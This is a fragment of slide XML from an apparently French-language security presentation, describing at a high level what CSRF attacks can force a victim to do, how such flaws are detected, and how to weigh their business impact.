                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>peuvent</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>concevoir</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> des pages web </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>malicieuses</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> , qui </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>génèrent</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> des </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>requêtes</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>spécialement</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>forgées</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>, qui </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>paraissent</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>ainsi</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>légitimes</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>.</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0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Une</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> faille </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>CSRF</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>est</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>assez</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> facile à </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>détecter</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> par </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>une</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>analyse</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> de code, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>ou</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> par un test </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>d’intrusion</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="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err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>L’attaquant</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>peut</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>  forcer la </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>victime</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> à </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>réaliser</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>n’importe</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>quelle</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>opération</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> de </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>changement</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> d’état</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>autorisée</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> à la </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>victime</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>. </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err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Ainsi</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>il</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>peut</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> la forcer à modifier son </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>compte</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>,  à faire</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> des </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>achats</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>,  à se </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>déconnecter</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>ou</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>même</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>  à se connecter.</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en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Estimer</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> la</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>valeur</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> métier des </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>données</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> et des </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>fonctions</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>qui </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>pourraient</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>être</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>affectées</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </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smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Imaginer </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>l’impact</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>qu’il</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> y </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>aurait</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> à ne pas  savoir </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>si</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> les actions </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>réalisées</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>ont</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>été</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>faites</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>intentionnellement</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>ou</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> pas, par </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>vos</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>utilisateurs</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Estimer</a:t>
                      </a:r>
                      <a:r>
